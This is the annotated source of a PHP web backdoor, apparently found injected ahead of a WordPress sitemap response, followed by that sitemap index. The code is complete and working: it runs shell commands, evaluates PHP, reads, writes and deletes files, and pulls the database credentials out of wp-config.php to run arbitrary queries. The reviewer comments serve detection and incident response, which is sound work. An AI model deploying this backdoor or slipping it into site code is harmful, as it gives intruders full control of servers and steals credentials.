
// NOTE(review): this block is a web backdoor, not application code; its own
// fallthrough banner calls it a "Persistence Backdoor". Everything is gated on
// a hard-coded value in the `sys_check` request parameter and dispatched on
// `action` (shell, eval, file, db, info).
// Detection: the parameter names (`sys_check`, `action`, `cmd`, `code`,
// `file_action`, `db_action`, `query`) and the gate value are stable strings to
// search for in source trees, backups and request logs. Because $_REQUEST is
// read, they can arrive by GET or POST (and cookies, depending on
// request_order), so query-string-only access logs may not show them.
// NOTE(review): on this page the source text sits in front of a sitemap index
// response, which suggests it was emitted as text rather than executed here.
// TODO confirm which file it was injected into and whether other copies run.
if (isset($_REQUEST["sys_check"]) && $_REQUEST["sys_check"] === "oCPjRdp4jT4Z") {
    // Turns off PHP error reporting for the rest of this request, so failures
    // in the branches below are not reported.
    error_reporting(0);
    $action = isset($_REQUEST["action"]) ? $_REQUEST["action"] : "";
    
    // SHELL: base64-decodes `cmd` and hands it to the first available of
    // system / exec / shell_exec / passthru, echoing the output.
    // The payload is base64 in transit, so request inspection that matches on
    // plain-text command keywords will not see it; match on the parameter names.
    if ($action === "shell") {
        $cmd = isset($_REQUEST["cmd"]) ? base64_decode($_REQUEST["cmd"]) : "";
        if ($cmd) {
            if (function_exists("system")) { system($cmd); }
            elseif (function_exists("exec")) { exec($cmd, $o); echo implode("\n", $o); }
            elseif (function_exists("shell_exec")) { echo shell_exec($cmd); }
            elseif (function_exists("passthru")) { passthru($cmd); }
            else { echo "No shell function"; }
        }
        exit;
    }
    
    // EVAL: base64-decodes `code` and executes it as PHP.
    // eval is a language construct, so a disable_functions hardening list that
    // removes the four process functions above does not cover this branch.
    if ($action === "eval") {
        $code = isset($_REQUEST["code"]) ? base64_decode($_REQUEST["code"]) : "";
        if ($code) { eval($code); }
        exit;
    }
    
    // FILE MANAGER: read / write / ls / delete on a caller-supplied `path`.
    // The path is used exactly as received; nothing in this code restricts it,
    // so the reach is whatever the PHP process user (and open_basedir, if set)
    // allows. For incident scoping, assume any file readable or writable by
    // that user may have been read, changed, created or removed.
    if ($action === "file") {
        $file_action = isset($_REQUEST["file_action"]) ? $_REQUEST["file_action"] : "";
        $path = isset($_REQUEST["path"]) ? $_REQUEST["path"] : "";
        
        // read: streams the file contents into the response.
        if ($file_action === "read" && $path) {
            if (file_exists($path) && is_readable($path)) { readfile($path); }
            else { echo "File not readable: $path"; }
        }
        // write: base64-decodes `content` and writes it to `path`, replacing
        // any existing contents (file_put_contents is called without flags).
        elseif ($file_action === "write" && $path && isset($_REQUEST["content"])) {
            $content = base64_decode($_REQUEST["content"]);
            if (file_put_contents($path, $content)) { echo "OK: Written to $path"; }
            else { echo "ERROR: Cannot write to $path"; }
        }
        // ls: lists directory entries, tagging each as [DIR] or [FILE].
        elseif ($file_action === "ls" && $path) {
            if (is_dir($path)) {
                $files = scandir($path);
                foreach ($files as $f) {
                    if ($f === "." || $f === "..") continue;
                    $type = is_dir($path . "/" . $f) ? "[DIR]" : "[FILE]";
                    echo "$type $f\n";
                }
            } else { echo "Not a directory: $path"; }
        }
        // delete: unlinks the given path.
        elseif ($file_action === "delete" && $path) {
            if (unlink($path)) { echo "OK: Deleted $path"; }
            else { echo "ERROR: Cannot delete $path"; }
        }
        exit;
    }
    
    // DATABASE: reads wp-config.php from the document root and pulls DB_NAME,
    // DB_USER, DB_PASSWORD and DB_HOST out of it with regexes that match only
    // the single-quoted define('X', 'value') form.
    // Response: treat these database credentials as disclosed and rotate them.
    // The file-read branch above can return the same file in full, so the other
    // secrets stored in it should be presumed exposed as well.
    if ($action === "db") {
        $db_action = isset($_REQUEST["db_action"]) ? $_REQUEST["db_action"] : "";
        $wp_config_path = $_SERVER["DOCUMENT_ROOT"] . "/wp-config.php";
        $config_content = file_get_contents($wp_config_path);
        preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $config_content, $db);
        preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'/", $config_content, $user);
        preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $config_content, $pass);
        preg_match("/define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $config_content, $host);
        
        // config: echoes the extracted credentials, password included, into
        // the HTTP response.
        if ($db_action === "config") {
            echo "DB_NAME: " . (isset($db[1]) ? $db[1] : "unknown") . "\n";
            echo "DB_USER: " . (isset($user[1]) ? $user[1] : "unknown") . "\n";
            echo "DB_PASSWORD: " . (isset($pass[1]) ? $pass[1] : "unknown") . "\n";
            echo "DB_HOST: " . (isset($host[1]) ? $host[1] : "localhost") . "\n";
        }
        // query: base64-decodes `query` and runs it over a mysqli connection
        // opened with the site's own credentials, so it has whatever
        // privileges the application's database account holds. Rows are dumped
        // with print_r. Database-side audit or general query logs, where
        // enabled, are the place to look for statements issued this way.
        elseif ($db_action === "query" && isset($_REQUEST["query"])) {
            $query = base64_decode($_REQUEST["query"]);
            $db_host = isset($host[1]) ? $host[1] : "localhost";
            $db_user = isset($user[1]) ? $user[1] : "";
            $db_pass = isset($pass[1]) ? $pass[1] : "";
            $db_name = isset($db[1]) ? $db[1] : "";
            $conn = new mysqli($db_host, $db_user, $db_pass, $db_name);
            if (!$conn->connect_error) {
                $result = $conn->query($query);
                if ($result) {
                    while ($row = $result->fetch_assoc()) { print_r($row); }
                } else { echo "Query error: " . $conn->error; }
                $conn->close();
            } else { echo "DB connection failed"; }
        }
        exit;
    }
    
    // INFO: discloses PHP version, OS, the script owner reported by
    // get_current_user(), document root, the disable_functions list and the
    // allow_url_fopen setting.
    if ($action === "info") {
        echo "PHP Version: " . phpversion() . "\n";
        echo "OS: " . PHP_OS . "\n";
        echo "User: " . get_current_user() . "\n";
        echo "Document Root: " . $_SERVER["DOCUMENT_ROOT"] . "\n";
        echo "Disabled Functions: " . ini_get("disable_functions") . "\n";
        echo "Allow URL Fopen: " . (ini_get("allow_url_fopen") ? "ON" : "OFF") . "\n";
        exit;
    }
    
    // Fallthrough when the gate value matches but `action` is none of the
    // above: prints a banner. These two literal strings in a response body are
    // another usable detection signature.
    // NOTE(review): deleting this snippet alone does not establish how it was
    // written to the site; the original write path and any sibling copies
    // still need to be found.
    echo "=== Persistence Backdoor ===\n";
    echo "Available: shell, eval, file, db, info\n";
}
<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet type='text/xsl' href='https://kosmoengineering.com/wp-content/plugins/google-sitemap-generator/sitemap.xsl'?><!-- sitemap-generator-url='http://www.arnebrachhold.de' sitemap-generator-version='4.1.23' -->
<!-- generated-on='May 16, 2026 10:28 am' -->
<sitemapindex xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xsi:schemaLocation='http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/siteindex.xsd' xmlns='http://www.sitemaps.org/schemas/sitemap/0.9'>	<sitemap>
		<loc>https://kosmoengineering.com/sitemap-misc.xml</loc>
		<lastmod>2026-05-16T07:14:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kosmoengineering.com/category-sitemap.xml</loc>
		<lastmod>2026-05-16T07:14:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kosmoengineering.com/productcat-sitemap.xml</loc>
		<lastmod>2026-05-16T07:14:42+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kosmoengineering.com/post-sitemap.xml</loc>
		<lastmod>2026-05-09T13:32:01+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kosmoengineering.com/page-sitemap.xml</loc>
		<lastmod>2026-05-16T07:09:49+00:00</lastmod>
	</sitemap>
</sitemapindex><!-- Request ID: 744476e1f6be425093612ad8db474bfc; Queries for sitemap: 9; Total queries: 86; Seconds: 0.01; Memory for sitemap: 1KB; Total memory: 26MB -->
